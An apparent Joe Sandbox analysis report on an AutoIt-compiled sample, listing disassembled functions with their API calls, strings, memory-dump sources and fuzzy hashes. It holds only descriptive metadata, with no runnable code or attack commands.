API String ID: 2641332412-570651680
Opcode ID: 0ab6bd57c2769523b3b3c0a7fd9b308df4a79cc3a9d666c3246d129738b5d5f6
Instruction ID: 30b0b18e468af62d7d02d398255fc33e35c629728c4d1f4c1ebb194875fc3dde
Opcode Fuzzy Hash: 0ab6bd57c2769523b3b3c0a7fd9b308df4a79cc3a9d666c3246d129738b5d5f6
Instruction Fuzzy Hash: AE62A370508340DFE724DF25C885BAA77E4BF44304F04497FE94A9B2D2DBB9A849CB5A

Function 00435C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

___createFile.LIBCMT ref: 00435EC3
___createFile.LIBCMT ref: 00435F04
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00435F2D
__dosmaperr.LIBCMT ref: 00435F34
GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00435F47
GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00435F6A
__dosmaperr.LIBCMT ref: 00435F73
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00435F7C
__set_osfhnd.LIBCMT ref: 00435FAC
__lseeki64_nolock.LIBCMT ref: 00436016
__close_nolock.LIBCMT ref: 0043603C
__chsize_nolock.LIBCMT ref: 0043606C
__lseeki64_nolock.LIBCMT ref: 0043607E
__lseeki64_nolock.LIBCMT ref: 00436176
__lseeki64_nolock.LIBCMT ref: 0043618B
__close_nolock.LIBCMT ref: 004361EB

Part of subcall function 0042EA9C: CloseHandle.KERNELBASE(00000000,004AEEF4,00000000,?,00436041,004AEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0042EAEC
Part of subcall function 0042EA9C: GetLastError.KERNEL32(?,00436041,004AEEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0042EAF6
Part of subcall function 0042EA9C: __free_osfhnd.LIBCMT ref: 0042EB03
Part of subcall function 0042EA9C: __dosmaperr.LIBCMT ref: 0042EB25

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

__lseeki64_nolock.LIBCMT ref: 0043620D
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00436342
___createFile.LIBCMT ref: 00436361
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 0043636E
__dosmaperr.LIBCMT ref: 00436375
__free_osfhnd.LIBCMT ref: 00436395
__invoke_watson.LIBCMT ref: 004363C3
__wsopen_helper.LIBCMT ref: 004363DD

Strings

@, xrefs: 00435F98

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
String ID: @
API String ID: 3896587723-2766056989
Opcode ID: 244aae909b1815d7daea63115d4a923dbb8dd9a4a003853186270c323b3b3ddc
Instruction ID: 258e66036f6fd46d17c8d5113c19e8d7647eaa250339654dbaeb5c90e1d5d4d5
Opcode Fuzzy Hash: 244aae909b1815d7daea63115d4a923dbb8dd9a4a003853186270c323b3b3ddc
Instruction Fuzzy Hash: 11224871A00506ABEF299F68DC46BAF7B71EB08314F25926BE9119B3D1C33D8D40C759

Function 0044FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_wcscpy.LIBCMT ref: 0044FA96
_wcschr.LIBCMT ref: 0044FAA4
_wcscpy.LIBCMT ref: 0044FABB
_wcscat.LIBCMT ref: 0044FACA
_wcscat.LIBCMT ref: 0044FAE8
_wcscpy.LIBCMT ref: 0044FB09
__wsplitpath.LIBCMT ref: 0044FBE6
_wcscpy.LIBCMT ref: 0044FC0B
_wcscpy.LIBCMT ref: 0044FC1D
_wcscpy.LIBCMT ref: 0044FC32
_wcscat.LIBCMT ref: 0044FC47
_wcscat.LIBCMT ref: 0044FC59
_wcscat.LIBCMT ref: 0044FC6E

Part of subcall function 0044BFA4: _wcscmp.LIBCMT ref: 0044C03E
Part of subcall function 0044BFA4: __wsplitpath.LIBCMT ref: 0044C083
Part of subcall function 0044BFA4: _wcscpy.LIBCMT ref: 0044C096
Part of subcall function 0044BFA4: _wcscat.LIBCMT ref: 0044C0A9
Part of subcall function 0044BFA4: __wsplitpath.LIBCMT ref: 0044C0CE
Part of subcall function 0044BFA4: _wcscat.LIBCMT ref: 0044C0E4
Part of subcall function 0044BFA4: _wcscat.LIBCMT ref: 0044C0F7

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 0044FA61
t2K, xrefs: 0044FC97

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
String ID: >>>AUTOIT SCRIPT<<<$t2K
API String ID: 2955681530-1835454193
Opcode ID: 397c2a9de392346911fd9c790da9d7e7ae7aadc563be971c949fde63b22b24f3
Instruction ID: 503cd1224aee480db27c81d30548323e2f4b0e484ad6717af54db5903cf95967
Opcode Fuzzy Hash: 397c2a9de392346911fd9c790da9d7e7ae7aadc563be971c949fde63b22b24f3
Instruction Fuzzy Hash: 03919471604205AFDB10EF55D891E9BB3E8BF44314F00486FF98997292DB38F948CB9A

Function 0042EE0E Relevance: 26.2, APIs: 17, Instructions: 664COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: __getptd_noexit
String ID:
API String ID: 3074181302-0
Opcode ID: 15010665da0bb20773641e5e9b09606b245cdeac25b31430a74b678c54aa5048
Instruction ID: 9abc610b2e9e61acfd5abb86b3433eb2eab915bc443fe6f83cdbfce99ad9ad18
Opcode Fuzzy Hash: 15010665da0bb20773641e5e9b09606b245cdeac25b31430a74b678c54aa5048
Instruction Fuzzy Hash: B7324770B00261DBDB21CF98E840BAE7BB1AF46314FE4417BE8559B392C7789C46C769

Function 00403F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
registrywindowclipboardCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00403F86
RegisterClassExW.USER32(00000030), ref: 00403FB0
RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00403FC1
6F5233E0.COMCTL32(?), ref: 00403FDE
6F532980.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00403FEE
LoadIconW.USER32(000000A9), ref: 00404004
6F52C400.COMCTL32(000000FF,00000000), ref: 00404013

Strings

0, xrefs: 00403F68
AutoIt v3 GUI, xrefs: 00403FA2
+, xrefs: 00403F6F
TaskbarCreated, xrefs: 00403FB6

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Register$BrushC400ClassClipboardColorF5233F532980FormatIconLoad
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 4082564816-1005189915
Opcode ID: 8cbb75d3f7e5a3698af6f0d0412bdfe020db27ea78879be70f390616e49b9fa0
Instruction ID: 39fee9d6861713e640d73bccf1ba937979938cd6d36e5674434e574d06268e08
Opcode Fuzzy Hash: 8cbb75d3f7e5a3698af6f0d0412bdfe020db27ea78879be70f390616e49b9fa0
Instruction Fuzzy Hash: F12108B5D01308AFDB40EFA4EC89BCDBBB4FB09704F00452AF511A62A0D7B44544CF99

Function 0044BFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0044BDB4: __time64.LIBCMT ref: 0044BDBE

Part of subcall function 00404517: _fseek.LIBCMT ref: 0040452F

__wsplitpath.LIBCMT ref: 0044C083

Part of subcall function 00421DFC: __wsplitpath_helper.LIBCMT ref: 00421E3C

_wcscpy.LIBCMT ref: 0044C096
_wcscat.LIBCMT ref: 0044C0A9
__wsplitpath.LIBCMT ref: 0044C0CE
_wcscat.LIBCMT ref: 0044C0E4
_wcscat.LIBCMT ref: 0044C0F7
_wcscmp.LIBCMT ref: 0044C03E

Part of subcall function 0044C56D: _wcscmp.LIBCMT ref: 0044C65D
Part of subcall function 0044C56D: _wcscmp.LIBCMT ref: 0044C670

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0044C2A1
DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0044C338
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0044C34E
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0044C35F
DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0044C371

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
String ID:
API String ID: 2378138488-0
Opcode ID: 2d3f61bed0371d27bb488f48ba0a5d5d60d1fa0b6d7278b81cc3c75f8688b2c3
Instruction ID: 97f54707bf9dff136f04eda468cc35fa1287b7f90913d34c6e51530f47754c09
Opcode Fuzzy Hash: 2d3f61bed0371d27bb488f48ba0a5d5d60d1fa0b6d7278b81cc3c75f8688b2c3
Instruction Fuzzy Hash: ABC12CB1E01129ABDF21DF96CC81EDEB7BDAF48304F0440ABF609E6151DB749A448F69

Function 00403E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00403E79
LoadCursorW.USER32(00000000,00007F00), ref: 00403E88
LoadIconW.USER32(00000063), ref: 00403E9E
LoadIconW.USER32(000000A4), ref: 00403EB0
LoadIconW.USER32(000000A2), ref: 00403EC2

Part of subcall function 00404024: LoadImageW.USER32(00400000,00000063,00000001,00000010,00000010,00000000), ref: 00404048

RegisterClassExW.USER32(?), ref: 00403F30

Part of subcall function 00403F53: GetSysColorBrush.USER32(0000000F), ref: 00403F86
Part of subcall function 00403F53: RegisterClassExW.USER32(00000030), ref: 00403FB0
Part of subcall function 00403F53: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00403FC1
Part of subcall function 00403F53: 6F5233E0.COMCTL32(?), ref: 00403FDE
Part of subcall function 00403F53: 6F532980.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00403FEE
Part of subcall function 00403F53: LoadIconW.USER32(000000A9), ref: 00404004
Part of subcall function 00403F53: 6F52C400.COMCTL32(000000FF,00000000), ref: 00404013

Strings

AutoIt v3, xrefs: 00403F1F
#, xrefs: 00403F09
0, xrefs: 00403F02

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Load$Icon$Register$BrushClassColor$C400ClipboardCursorF5233F532980FormatImage
String ID: #$0$AutoIt v3
API String ID: 1709080761-4155596026
Opcode ID: 87d0efc2a200e611afc57662db2d9fe5074bb5fa0814b132d49e4943f5861427
Instruction ID: 6fc82eccf78ee3bbffcc202bd0bda0f016539c707d5aa7d19e764feb260bae21
Opcode Fuzzy Hash: 87d0efc2a200e611afc57662db2d9fe5074bb5fa0814b132d49e4943f5861427
Instruction Fuzzy Hash: E7212AB4D00304AFDB40DFAAEC45E99BFF5FB49314F14853AE214A22B2D77946508B99

Function 009B5368 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 009B5439
VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 009B565F

Memory Dump Source

Source File: 00000000.00000002.1655918152.00000000009B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.0000000000970000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.000000000097A000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.000000000097E000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.0000000000995000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655930012.00000000009B7000.00000004.00000020.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_ZsRFRjkt9q.jbxd

Yara matches

Similarity

API ID: CreateFileFreeVirtual
String ID:
API String ID: 204039940-0
Opcode ID: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
Instruction ID: 61b71383918e18f379398dbf50f915d2072527d820511b294a162c57fe123ab2
Opcode Fuzzy Hash: 7a8af28d10d872e8c42d0e09e8738e4af41cabd85448581b7ead53f150642b41
Instruction Fuzzy Hash: F9A11970E00609EBDB24CFA4C998BEEB7B6FF48315F208559E515BB280D7799A81CF50

Function 004049FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00404A1D
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 004741DB
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0047421A
RegCloseKey.ADVAPI32(?), ref: 00474249

Strings

Include, xrefs: 004741D3, 00474212
Software\AutoIt v3\AutoIt, xrefs: 00404A13

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: Include$Software\AutoIt v3\AutoIt
API String ID: 1586453840-614718249
Opcode ID: 6e2642f92ac6b630ee04a3de7f9ccbad1b1158d06de569f2c8570250353f6bad
Instruction ID: 24367ca1c3048aa5880316b58277e600b20755b5d821188449d38961baa88e0d
Opcode Fuzzy Hash: 6e2642f92ac6b630ee04a3de7f9ccbad1b1158d06de569f2c8570250353f6bad
Instruction Fuzzy Hash: D6116071A01109BEEB04ABA4CD86EFF7BACEF45348F10446AB506E7191EB745E01DB58

Function 004036B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 004036E6
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403707
ShowWindow.USER32(00000000,?,?,?,?,00403AA3,?), ref: 0040371B
ShowWindow.USER32(00000000,?,?,?,?,00403AA3,?), ref: 00403724

Strings

AutoIt v3, xrefs: 004036DE, 004036E3, 004036E4
edit, xrefs: 00403701

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 5d8e0124634df2f6e3b1d57e41c7542da14dc5e0961a2e3f2bc33fd230573aeb
Instruction ID: 4d08d86da7aa94d300ca7f7225cc14ad318fbe6330d37f8c56b478b09d34b1b0
Opcode Fuzzy Hash: 5d8e0124634df2f6e3b1d57e41c7542da14dc5e0961a2e3f2bc33fd230573aeb
Instruction Fuzzy Hash: 57F0FE719402D07AEB715767AC48E773E7DEBC7F20F00403FBA04A25B1C66508A5DAB8

Function 009B50D8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 164
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 009B4FC8: Sleep.KERNELBASE(000001F4), ref: 009B4FD9

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009B524C

Strings

STXOSTMS319CC3PMK69FHNXYZP6B1E, xrefs: 009B52B5, 009B52B8

Memory Dump Source

Source File: 00000000.00000002.1655918152.00000000009B2000.00000040.00000020.00020000.00000000.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1655834706.0000000000930000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.0000000000970000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.000000000097A000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.000000000097E000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655852510.0000000000995000.00000004.00000020.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1655930012.00000000009B7000.00000004.00000020.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_ZsRFRjkt9q.jbxd

Yara matches

Similarity

API ID: CreateFileSleep
String ID: STXOSTMS319CC3PMK69FHNXYZP6B1E
API String ID: 2694422964-2642578043
Opcode ID: 87f4d3365eeedc5e9bfb2dcf6a23e6fa031493ad40c4c8b14a1d1d98e08ee176
Instruction ID: 04441ecd92065e3d2228d32a1433badd905d414b6780ce51bb93193983e4b0e0
Opcode Fuzzy Hash: 87f4d3365eeedc5e9bfb2dcf6a23e6fa031493ad40c4c8b14a1d1d98e08ee176
Instruction Fuzzy Hash: 9A718130D0428CDAEF11DBB4D8547EEBB75AF19314F044199E258BB2C1D7B90B49CBA6

Function 00404A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C1148,?,004061FF,?,00000000,00000001,00000000), ref: 00405392

Part of subcall function 004049FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00404A1D

_wcscat.LIBCMT ref: 00472D80
_wcscat.LIBCMT ref: 00472DB5

Strings

8!L, xrefs: 00404B1C
\, xrefs: 00472DA2
\Include\, xrefs: 00404B0A

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: _wcscat$FileModuleNameOpen
String ID: 8!L$\$\Include\
API String ID: 3592542968-1316215114
Opcode ID: fa8a9e684f192d5f0ec16de0341574a8dd1ab902b51a2da00cf2f8cb0f237409
Instruction ID: 69193c1904a342b4ff2347d59ce207587477678b7e20525fd4ba8b54dc9425ab
Opcode Fuzzy Hash: fa8a9e684f192d5f0ec16de0341574a8dd1ab902b51a2da00cf2f8cb0f237409
Instruction Fuzzy Hash: ED514CB54043409FC754EF56EA818AAB7F4BA49304B48453FF649A32A1DFF89608CB5E

Function 00404139 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON

Download Yara Rule

APIs

Part of subcall function 004041A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004039FE,?,00000001), ref: 004041DB

_free.LIBCMT ref: 004736B7
_free.LIBCMT ref: 004736FE

Part of subcall function 0040C833: __wsplitpath.LIBCMT ref: 0040C93E
Part of subcall function 0040C833: _wcscpy.LIBCMT ref: 0040C953
Part of subcall function 0040C833: _wcscat.LIBCMT ref: 0040C968
Part of subcall function 0040C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0040C978

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00473491
Bad directive syntax error, xrefs: 004736E4

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 805182592-1757145024
Opcode ID: e8c0f620e7d26697f5717d3f25be888f6702f14b3a6d4afae85d9ca23b425d95
Instruction ID: a5069b7475330fe088817bec80de3aee8e84fa7b19bb18b6e651e427e71290f0
Opcode Fuzzy Hash: e8c0f620e7d26697f5717d3f25be888f6702f14b3a6d4afae85d9ca23b425d95
Instruction Fuzzy Hash: 91916071910219AFCF14EFA5CC919EEB7B4BF14314F10842FF415AB291DB38AA45DB98

Function 004040E5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00473725
7523D0D0.COMDLG32 ref: 0047376F

Part of subcall function 0040660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004053B1,?,?,004061FF,?,00000000,00000001,00000000), ref: 0040662F

Part of subcall function 004040A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004040C6

Strings

X, xrefs: 0047373E
t3K, xrefs: 00473745

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: NamePath$7523FullLong_memset
String ID: X$t3K
API String ID: 3285060876-2811000538
Opcode ID: b93b0c1c5738115443a6aa44457fd713ed33a969696249c1967a6bebbd69b3da
Instruction ID: 9ad05c4a51ad5a7aed7e064f7d04d0a32a4adfcb21fa2545d4e7afce16479d8e
Opcode Fuzzy Hash: b93b0c1c5738115443a6aa44457fd713ed33a969696249c1967a6bebbd69b3da
Instruction Fuzzy Hash: C62196B1A101989BCB01DF95D845BDE7BF89F89305F00806FE505BB281DBBC5A898F69

Function 004234AE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

__getstream.LIBCMT ref: 004234FE

Part of subcall function 00427C0E: __getptd_noexit.LIBCMT ref: 00427C0E

@_EH4_CallFilterFunc@8.LIBCMT ref: 00423539
__wopenfile.LIBCMT ref: 00423549

Strings

<G, xrefs: 004234CD, 004234F0, 004234FC

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

